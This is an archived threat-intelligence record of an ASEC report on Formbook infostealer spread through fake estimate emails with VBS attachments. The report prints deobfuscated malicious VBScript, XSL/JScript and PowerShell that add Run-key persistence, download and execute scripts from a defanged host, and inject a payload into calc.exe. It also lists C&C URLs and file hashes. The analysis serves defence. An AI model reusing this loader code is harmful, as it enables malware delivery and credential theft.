{
	"id": "c00a7d55-516e-47cf-8f65-536c930a83a5",
	"created_at": "2026-04-06T00:16:18.122855Z",
	"updated_at": "2026-04-10T03:20:56.863383Z",
	"deleted_at": null,
	"sha1_hash": "a85b00c9a4857b9280ea886351bd49a78c715b48",
	"title": "Change in Distribution Method of Malware Disguised as Estimate (VBS Script) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1091112,
	"plain_text": "Change in Distribution Method of Malware Disguised as Estimate\r\n(VBS Script) - ASEC\r\nBy ATCP\r\nPublished: 2022-02-21 · Archived: 2026-04-05 15:39:45 UTC\r\nLast year, the ASEC analysis team has discovered the distribution of Formbook that used a certain company’s\r\nname in its filename. Recently, the team has discovered that it is being distributed via VBS file. The email used for\r\ndistribution still contains details about a request for an estimate, and by using a certain company’s name in the\r\nattachment, it prompts the user to execute it.\r\nFigure 1. Email 1\r\nFigure 2. Email 2\r\nThe compressed file attached to the email does not contain an executable but a VBS file.\r\nFigure 3. Inside the attached compressed file\r\nAll the malicious files that are being distributed are using the same company’s name with different dates, and\r\ndates differ by the distribution date. The names of the files that have been discovered so far are as follows;\r\nKor***IndustryDevelopment(2022.02.03).pdf.vbs\r\nhttps://asec.ahnlab.com/en/32149/\r\nPage 1 of 5\n\nKor***IndustryDevelopment(2022.02.04).pdf.vbs\r\nKor***IndustryDevelopment(2022.02.07).pdf.vbs\r\nKor***IndustryDevelopment(2022-02-10).pdf.vbs\r\nKor***IndustryDevelopment(2022.02.16).pdf.vbs\r\nKor***IndustryDevelopment(2022.02.17).pdf.vbs\r\nKor***IndustryDevelopment(2022.02.21).pdf.vbs\r\nCertain values are obfuscated in Kor***IndustryDevelopment(2022.02.21).pdf.vbs. When unobfuscated, it shows\r\nthe code that performs the feature of registering to Run Key and accessing a certain URL.\r\nSub eQACeDnGd()\r\nConst zTZPNQXZ = \u0026H80000001\r\nSet izXSnKvcF=Eval(\"GetObject(WSBI() + \"\"default:StdRegProv\"\")\")\r\nCso = \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\nFklft = \"jtZsps\"\r\nXqTs = \"C:\\Users\\[UserName]\\Music\\\" + [Script filename]\r\nizXSnKvcF.SetStringValue zTZPNQXZ,Cso,Fklft,XqTs\r\nEnd Sub\r\nSub FRgMMrSnNR()\r\nOn Error Resume Next\r\n Set uVzfiIPoT = Eval(\"GetObject(new:F5078F32-C551-11D3-89B9-0000F81FE221)\") 'MSXML2.DOMDocument.3.0의 CLASSID\r\n uVzfiIPoT.async = False\r\n Execute(\"uVzfiIPoT.Load hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg\")\r\n Execute(\"uVzfiIPoT.transformNode (uVzfiIPoT)\")\r\nEnd Sub\r\nUpon executing the VBS file, it accesses hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg, and executes the\r\nadditional script that exists in this URL. It then adds C:\\Users\\\r\n[UserName]\\Music\\Kor***IndustryDevelopment(2022.02.21).pdf.vbs to\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\jtZsps registry to enable the malicious script for it\r\nexecute consistently.\r\nIt also performs the command below to self-copy under the same filename into the C:\\Users\\[UserName]\\Music\\\r\nfolder that is added to the registry.\r\ncmd /c copy “Kor***IndustryDevelopment(2022.02.21).pdf.vbs” “C:\\Users\\[UserName]\\Music” /Y\r\nThe script code below exists in hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg, and when accessing this\r\nURL, powershell is executed.\r\n\u003cxsl:stylesheet version=\"1.0\"\r\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\r\n xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\r\n xmlns:user=\"http://mycompany.com/mynamespace\"\u003e\r\nhttps://asec.ahnlab.com/en/32149/\r\nPage 2 of 5\n\n\u003cmsxsl:script language=\"JScript\" implements-prefix=\"user\"\u003e\r\n\u003c![CDATA[\r\n-omitted-var yy=r.ShellExecute(\"powershell.exe\",eioerhidfsg44g00ggg(\"2474303D27444535272E7265706C616365282744272C27492729\r\n-omitted-\r\n\u003cem\u003efunction\u003c/em\u003e eioerhidfsg44g00ggg(hex) {\r\n var str = '';\r\n for (var i = 0; i \u003c hex.length; i += 2) {\r\n var v = parseInt(hex.substr(i, 2), 16);\r\n if (v) str += String.fromCharCode(v);\r\n }\r\n return str;\r\n}\r\nThe obfuscated powershell command ultimately performs the command below and downloads additional scripts\r\nfrom hxxp://wisewomanwarrior[.]com/wp-admin/self1.jpg.\r\n$t0='IEX';\r\nsal g $t0;\r\n$gf=\"$ErrorActionPreference = 'SilentlyContinue';\r\n$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);\r\n[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;\r\nAdd-Type -AssemblyName Microsoft.VisualBasic;do {$ping = test-connection -comp google.com -count 1 -Quiet} until\r\n$tty=g('(New-Object Net.WebClient)');\r\n$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Met\r\ng([system.String]::Join('', $gf))\r\nHxxp://wisewomanwarrior[.]com/wp-admin/self1.jpg contains obfuscated powershell command and compressed\r\nfile data. This script decompresses the data and injects it into a certain process.\r\n$eqCH=(01100110,01110101,01101110,01100011,\u003comitted\u003e ,01111101) | %{ [System.Text.Encoding]::UTF8.GetString([Sy\r\n[Byte[]]$MNB=('_\u003c1F,_\u003c8B,_\u003c08, \u003comitted\u003e,_\u003c00'.replace('_\u003c','0x'))|g;\r\n[byte[]]$FFCgPVE = tMCfkSD $MNB\r\n[Byte[]]$uiMz=('_\u003c1F,_\u003c8B,_\u003c08, \u003comitted\u003e ,_\u003c02,_\u003c00'.replace('_\u003c','0x'))|g\r\n$ayy = [Microsoft.VisualBasic.Interaction]::CallByname([AppDomain]::CurrentDomain,\"Load\",[Microsoft.VisualBasic.\r\n[toooyou]::Black('calc.exe',$uiMz)\r\nUpon executing the script above, it uses the function inside the .Net executable that is saved to the $MNB variable\r\nto inject the data inside $uiMz to calc.exe.\r\nhttps://asec.ahnlab.com/en/32149/\r\nPage 3 of 5\n\nFigure 4. Process tree shown via AhnLab’s RAPIT system\r\nThe injected data is the Formbook infostealer. It operates by injecting into the normal process explorer.exe and\r\nanother normal process in system32 path and steals user credentials via C\u0026C connection.\r\nC\u0026C : hxxp://www.bumabagi[.]com/p7n9/\r\nMalware disguised as an estimate has been consistently distributed from the past, so user caution is necessary. As\r\nthe malicious files are disguised under the name of actual companies as shown above, users must check the sender\r\nand refrain from executing links or attachments in emails from unknown senders.\r\nAhnLab’s anti-malware software detects and blocks the malware using the aliases below.\r\n[Behavior and Memory Detection]\r\nMalware/MDP.Inject.M3044\r\nMalware/MDP.Inject.M3509\r\nRansom/MDP.BlueCrab.M3544\r\nTrojan/Win.Formbook.XM89\r\nhttps://asec.ahnlab.com/en/32149/\r\nPage 4 of 5\n\n[File Detection]\r\nDownloader/VBS.Generic\r\nMD5\r\n23c238466940b27bf287dccaf3407923\r\ncdfbfe783f4b40bdb86c1ac3bc126596\r\nf7918d4a953248d4878f0332bd235a53\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//wisewomanwarrior[.]com/wp-admin/self2[.]jpg\r\nhttp[:]//www[.]bumabagi[.]com/p7n9/\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/32149/\r\nhttps://asec.ahnlab.com/en/32149/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/32149/"
	],
	"report_names": [
		"32149"
	],
	"threat_actors": [],
	"ts_created_at": 1775434578,
	"ts_updated_at": 1775791256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a85b00c9a4857b9280ea886351bd49a78c715b48.pdf",
		"text": "https://archive.orkl.eu/a85b00c9a4857b9280ea886351bd49a78c715b48.txt",
		"img": "https://archive.orkl.eu/a85b00c9a4857b9280ea886351bd49a78c715b48.jpg"
	}
}